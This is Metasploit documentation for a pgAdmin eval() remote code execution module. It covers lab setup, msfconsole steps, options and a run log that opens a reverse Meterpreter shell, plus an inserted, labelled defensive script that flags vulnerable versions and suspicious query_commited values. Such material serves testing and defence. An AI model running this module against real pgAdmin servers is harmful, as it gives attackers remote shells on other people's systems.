metasploit-gs/documentation/modules/exploit/multi/http/pgadmin_query_tool_authenticated.md
2025-04-10 10:53:05 -07:00

Vulnerable Application

Description

This module exploits a vulnerability in pgAdmin where an authenticated user can establish a connection to the query tool and send a specific payload in the query_commited POST parameter. This payload is directly executed via a Python eval() statement, resulting in remote code execution in versions prior to 9.2.

To exploit this vulnerability, pgAdmin credentials are required. Additionally, in order to interact with the vulnerable SQL editor component, valid database credentials are necessary to initialize a session and obtain a transaction ID, which is required for the exploit.
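Two defender-side checks for the issue described above, written as an added example and not taken from the Metasploit module or from pgAdmin itself. It assumes a captured request is available as path, content type and body, that the query tool accepts either a form-encoded or a JSON body, and that a legitimate query_commited value is only ever a boolean literal; all sample data is constructed.

```python
import json
import re
from urllib.parse import parse_qs

FIXED_VERSION = (9, 2, 0)          # the module text states versions prior to 9.2 are affected
LEGIT_VALUES = {"true", "false"}   # assumption: only boolean literals are legitimate


def parse_version(version: str) -> tuple:
    """Turn '9.0.0' or '9.2' into a comparable tuple padded to three components."""
    parts = [int(p) for p in re.findall(r"\d+", version)[:3]]
    return tuple(parts + [0] * (3 - len(parts)))


def is_affected(version: str) -> bool:
    """True when the reported pgAdmin version is older than the fixed release."""
    return parse_version(version) < FIXED_VERSION


def query_commited_values(body: str, content_type: str) -> list:
    """Extract every query_commited value from a captured POST body (form or JSON)."""
    if content_type.startswith("application/json"):
        val = json.loads(body).get("query_commited")
        return [] if val is None else [str(val)]
    return parse_qs(body, keep_blank_values=True).get("query_commited", [])


def suspicious_requests(requests: list) -> list:
    """Return (path, value) pairs whose query_commited is not a plain boolean literal.

    Anything else reaching an eval() call would be executed as Python, so a
    non-boolean value is the signal worth alerting on.  Each request is a dict
    with 'path', 'content_type' and 'body' (constructed capture format)."""
    hits = []
    for req in requests:
        for v in query_commited_values(req["body"], req["content_type"]):
            if v.strip().lower() not in LEGIT_VALUES:
                hits.append((req["path"], v))
    return hits


# Constructed sample captures: a normal form post, a normal JSON post, and one
# carrying an arithmetic expression instead of a boolean (benign but non-boolean).
SAMPLE_REQUESTS = [
    {"path": "/query_tool/start/TXID", "content_type": "application/x-www-form-urlencoded",
     "body": "query_commited=false&sql=SELECT+1"},
    {"path": "/query_tool/start/TXID", "content_type": "application/json",
     "body": '{"query_commited": true, "sql": "SELECT 1"}'},
    {"path": "/query_tool/start/TXID", "content_type": "application/x-www-form-urlencoded",
     "body": "query_commited=1%2B1&sql=SELECT+1"},
]

if __name__ == "__main__":
    print("9.0.0 affected:", is_affected("9.0.0"))
    print("suspicious:", suspicious_requests(SAMPLE_REQUESTS))
```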

Setup

A pgAdmin Docker instance can be started using the following command:

docker run -d -p 8484:80 -e PGADMIN_DEFAULT_EMAIL=admin@admin.com -e PGADMIN_DEFAULT_PASSWORD=adminpassword --name pgadmin dpage/pgadmin4:9.0

A PostgreSQL database must be registered in the pgAdmin instance for the exploit to work; the PostgreSQL version does not matter:

docker run -d -p 5432:5432 --name postgres -e POSTGRES_PASSWORD=mysecretpassword -e POSTGRES_USER=pgadminuser -e POSTGRES_DB=pgadmin postgres:latest

Verification Steps

  1. Start msfconsole.
  2. Do: use exploit/multi/http/pgadmin_query_tool_authenticated.
  3. Set the RHOST, USERNAME, PASSWORD, DB_USER, DB_PASS and DB_NAME options.
  4. Run the module.
  5. Receive a Meterpreter session as the pgAdmin user.

Options

USERNAME

The username for authentication (required).

PASSWORD

The password for authentication (required).

DB_USER

The database username to authenticate to the database with (required).

DB_PASS

The password to authenticate to the database with (required).

DB_NAME

The name of the database to target (required).

MAX_SERVER_ID

The maximum number of server IDs to try when connecting. The module iterates over server IDs to find the one that corresponds to the registered database, because a valid server ID (sid) is required to connect to the query tool and exploit the vulnerability. The default value is 10.

Scenarios

pgAdmin 4 v9.0

msf6 exploit(multi/http/pgadmin_query_tool_authenticated) > run db_name=postgres db_user=pgadminuser db_pass=mysecretpassword rhost=127.0.0.1 rport=8484 username=admin@admin.com password=adminpassword lhost=172.16.199.1 MAX_SERVER_ID=10 verbose=true
[*] Started reverse TCP handler on 172.16.199.1:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. pgAdmin version 9.0.0 is affected
[+] Successfully authenticated to pgAdmin
[*] Trying server ID: 1
[*] Trying server ID: 2
[*] Trying server ID: 3
[+] Successfully initialized sqleditor
[*] Exploiting the target...
[*] Sending stage (24772 bytes) to 172.16.199.1
[+] Received a 500 response from the exploit attempt, this is expected
[*] Meterpreter session 3 opened (172.16.199.1:4444 -> 172.16.199.1:62455) at 2025-04-09 17:05:17 -0700

meterpreter > getuid
Server username: pgadmin
meterpreter > sysinfo
Computer     : e9b855f7cda2
OS           : Linux 6.10.14-linuxkit #1 SMP PREEMPT_DYNAMIC Thu Mar 20 16:36:58 UTC 2025
Architecture : x64
Meterpreter  : python/linux
meterpreter >